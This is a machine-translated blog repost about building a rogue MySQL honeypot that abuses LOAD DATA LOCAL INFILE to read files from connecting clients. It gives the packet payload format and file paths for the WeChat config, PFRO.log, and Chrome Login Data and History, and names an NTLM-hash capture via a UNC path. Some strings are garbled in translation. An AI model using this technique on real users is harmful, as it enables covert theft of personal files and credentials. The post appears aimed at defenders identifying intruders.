Shulou(Shulou.com)06/01 Report--

This article is about how to get the attacker Wechat ID through the honeypot in MySQL. The editor thinks it is very practical, so I share it with you to learn. I hope you can get something after reading this article. Without saying much, follow the editor to have a look.

Principle

The load data local infile'/ etc/passwd' into table test fields terminated by'\ npermission; statement in MySQL can read the client-side local file and insert it into the table, so we can fake a malicious server and send the payload reading the file to the client connecting to the server. This technology is not new, but some good results can be achieved by rational use.

Utilization

Grab a packet and take a look at the two key points of communication between the client and the server when connecting MySQL:

The server first returns the version, salt and other information:

After the client sends the account password information to the server, the server returns the package with successful authentication:

At this point, we just need to wait for the client to send another package, and then we can send the payload to read the file, and then take a look at the read file package:

Where 000001 refers to the sequence number of the packet, fb refers to the type of packet, the last box refers to the file name to be read, and the first 14 refers to the length of the file name (starting from fb, hexadecimal), so payload is chr (len (filename) + 1) + "\ X00\ X00\ X01\ xFB" + filename.

In the case of being able to read arbitrary files, what we want most is to be able to read information related to the attacker. In daily life, almost everyone will use Wechat, and if the attacker does not achieve the separation of office-infiltration environment, we have a chance to get the attacker's Wechat ID

Under Windows, the default configuration file of Wechat is placed in C:\ Users\ username\ Documents\ WeChat Files\. If you search inside, you will find that C:\ Users\ username\ Documents\ WeChat Files\ All Users\ config\ config.data contains Wechat ID:

And get this file also need a condition, that is to know the attacker's computer user name, the user name is generally likely to appear in some log files, we need to look for some more general files with fixed file names. After testing, it is found that computers that have been used for a period of time are more likely to find a user name in C:\ Windows\ PFRO.log.

camouflage

Attackers often carry out host discovery and port scanning after entering the intranet. If the MySQL is scanned, it is possible to explode. If the honeypot can not let the scanner identify the weak password, it is useless, so you still need to grab the scanner's packet.

Here, take the super weak password checking tool as an example. First, set up a normal MySQL service locally, and wireshark grab the package to see what requests the scanner has:

As you can see, this tool sends out five query packages after verifying the password. If the result is incorrect, the weak password cannot be identified. Then we extract the response data of the server and put it into the program. When these requests are received, the corresponding package is returned:

This allows the scanner to recognize:

Effect.

When an attacker discovers that there is a weak password, he will most likely connect to it and take a look at it. If he uses navicat, he will be able to read the file:

Write a simple web to display the attacker's Wechat ID, scan it and add TA.

Thinking

Besides getting Wechat ID, what other valuable things can we get?

Although the login data of chrome cannot decrypt the password, it can still obtain some accounts of the other party.

'CJUSERGUST'+ username +'/ AppData/Local/Google/Chrome/User Data/Default/Login Data'

The history of chrome

'CJUSERGUST'+ username +'/ AppData/Local/Google/Chrome/User Data/Default/History'

User's NTLM Hash (Bettercap + responder)

\\ ip\ test

The above is how to get the attacker Wechat ID through the honeypot in MySQL. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.